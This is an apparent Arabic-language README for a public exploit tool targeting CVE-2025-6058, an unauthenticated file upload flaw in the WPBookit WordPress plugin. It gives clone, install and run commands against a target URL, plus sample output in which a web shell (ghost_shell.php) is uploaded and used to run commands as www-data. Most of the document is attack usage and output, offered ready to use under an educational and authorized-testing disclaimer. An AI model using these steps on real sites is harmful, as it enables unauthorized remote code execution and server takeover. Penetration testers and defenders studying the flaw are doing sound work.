
استغلال رفع ملفات بدون مصادقة في WPBookit لووردبريس ≤ 1.0.4
استغلال رفع ملفات عشوائي بدون مصادقة يستهدف إضافة ووردبريس WPBookit (≤ 1.0.4)
يتيح الاستغلال رفع شيل عن بُعد وتنفيذ أوامر كاملة.
المؤلف: 0xgh057r3c0n
CVE-2025-6058 هي ثغرة حرجة تؤثر على إضافة WPBookit في نظام إدارة المحتوى ووردبريس. يمكن لمهاجم غير مصادَق استغلال نقطة نهاية AJAX ضعيفة لرفع ملفات PHP عشوائية، مما يتيح تنفيذ الأوامر عن بُعد (RCE).
README.txtghost_shell.php)python3 --version
pip install requests
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com
python3 CVE-2025-6058.py -u https://victim.com
[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.
[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
[!] Interactive GhostShell Started — type 'exit' to quit.
┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
ghost_shell.php/wp-content/uploads/YYYY/MM/ghost_shell.phphttps://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
تم تطوير هذا الاستغلال لأغراض تعليمية ولاختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به ضد الأنظمة دون موافقة صريحة غير قانوني.
صدر بموجب رخصة MIT
صُنع لتدقيق أمن ووردبريس 🛡️ بواسطة 0xgh057r3c0n